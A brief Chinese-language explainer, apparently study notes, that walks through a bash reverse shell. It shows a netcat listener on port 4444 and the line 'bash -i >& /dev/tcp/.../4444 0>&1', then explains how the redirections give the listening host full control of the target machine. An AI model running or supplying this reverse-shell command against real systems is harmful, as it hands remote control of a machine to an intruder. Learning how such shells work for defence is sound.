nc -p 4444 -lvv
監聽在4444端口, 監聽模式, 顯示命令執行過程, 假設本機IP地址10.100.125.15
bash -i >& /dev/tcp/10.100.125.15
/4444 0>&1, 假設本機IP地址爲10.100.125.14
bash -i : bash的交互模式
當>&後面接文件時,表示將標準輸出和標準錯誤輸出重定向至文件
當>&後面接文件描述符時,表示將前面的文件描述符重定向至後面的文件描述符
本例中/dev/tcp/10.100.125.15
/4444 可以看做是一個文件。打開這個文件就相當於進行了一個socket調用,建立一個socket連接
那麼 10.100.125.14上的執行bash的terminal 的標準輸出和錯誤輸出都會發送給10.100.125.15,那麼黑客在15 上也就看到了14上的左右的操作了。
但是15不僅要知道14上的操作和結果,還要能控制14. 所以要對14的輸入重定向到15, 也即0>&1.
這樣在15上黑客就可以將命令發送給14, 14執行後的輸出給15,,14就完全被控制了。